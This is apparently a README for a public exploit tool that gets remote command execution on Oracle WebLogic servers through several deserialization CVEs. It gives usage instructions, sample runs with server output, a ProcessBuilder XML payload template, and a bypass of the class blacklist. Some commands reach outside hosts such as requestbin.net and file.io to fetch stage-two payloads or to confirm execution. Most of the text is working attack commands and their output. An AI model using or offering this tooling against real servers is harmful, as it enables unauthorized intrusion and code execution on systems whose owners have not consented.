
WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit
WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 générateur de payload & exploit
$ python3 weblogic_exploit.py -h
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
[-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
target
positional arguments:
target Target Server
optional arguments:
-h, --help show this help message and exit
-pl PAYLOAD, --payload PAYLOAD Use one of the available payloads: (default: fs_xml_app_ctx)
- process_builder (CMD - all versions)
- unit_of_work_change_set (SERIAL - 10.x versions)
- event_data (CMD - 12.x versions)
- fs_xml_app_ctx (URL - all versions).
-ep ENDPOINT, --endpoint ENDPOINT Use one of the configured endpoints: (default: automatic)
- wls_wsat (CMD output)
- _async (Blind Exec).
-c CMD, --cmd CMD Command to execute. (default: whoami)
-j, --jdk6 Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
-u URL, --url URL Url to fetch stage2. Used with 'URL' payloads. (default: None)
-y YSOSERIAL, --ysoserial YSOSERIAL Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
-tr TERMINAL, --terminal TERMINAL Use one of the available terminals: cmd, bash, powershell, none (default: bash)
-px PROXY, --proxy PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default: None)
This script will generate a valid WebLogic SOAP payload to exploit different CVE's on this web server.
Avec les payloads SERIAL, vous pouvez passer une commande (pour générer dynamiquement un payload ysoserial) ou générer manuellement un payload ysoserial et le donner au script en utilisant l'argument -y.
Pour générer dynamiquement un payload ysoserial, vous devez télécharger le fichier https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar et le placer dans le même répertoire que ce script.
Le payload unit_of_work_change_set est connu pour ne fonctionner que sur les versions 10.x de Weblogic. Exemples :
pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0
pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0
Avec les payloads URL (FileSystemXmlApplicationContext), vous pouvez héberger votre propre XML et le passer avec l'argument -u, ou laisser l'exploit générer un fichier de payload éphémère pour vous et l'héberger sur https://file.io ! Ce payload sera généré pendant la phase d'exploitation et sera supprimé une fois que le serveur le récupère à distance. Si vous voulez héberger votre propre payload, veuillez utiliser le modèle suivant pour cela :
<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
</list>
</constructor-arg>
</bean>
</beans>
Ce payload est connu pour fonctionner sur toutes les versions de Weblogic. L'inconvénient de ce payload est qu'il nécessite une sortie (egress) sur le serveur cible pour récupérer un payload stage2. Un exemple d'utilisation de ce payload est décrit ci-dessous :
$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0
Et enfin, le payload process_builder est le payload d'exploit le plus courant (module metasploit) qui fonctionne sur les versions de Weblogic non patchées contre la blacklist class=. Ce payload a été personnalisé pour afficher la sortie de la commande dans le corps de la réponse de la requête. Exemple d'utilisation :
pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Ajout du support du payload event_data avec sortie de commande dans le corps de la réponse. Exemple d'utilisation :
$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Crédits : Partie du payload publié sur ce github utilisée pour afficher les résultats de la commande dans le corps de la réponse (https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py). Merci d'avoir partagé ceci @lufeirider.
Ajout du support de CVE-2019-2729. Il s'agit d'un contournement pour remplacer <class> </class> par <array method="forName"> </array>. Ce contournement ne fonctionne que sur JDK 1.6 en raison d'une divergence dans la façon dont cette version de JDK analyse les données XML via XMLDecoder.
L'argument de commande -j/--jdk6 a été ajouté au script d'exploit.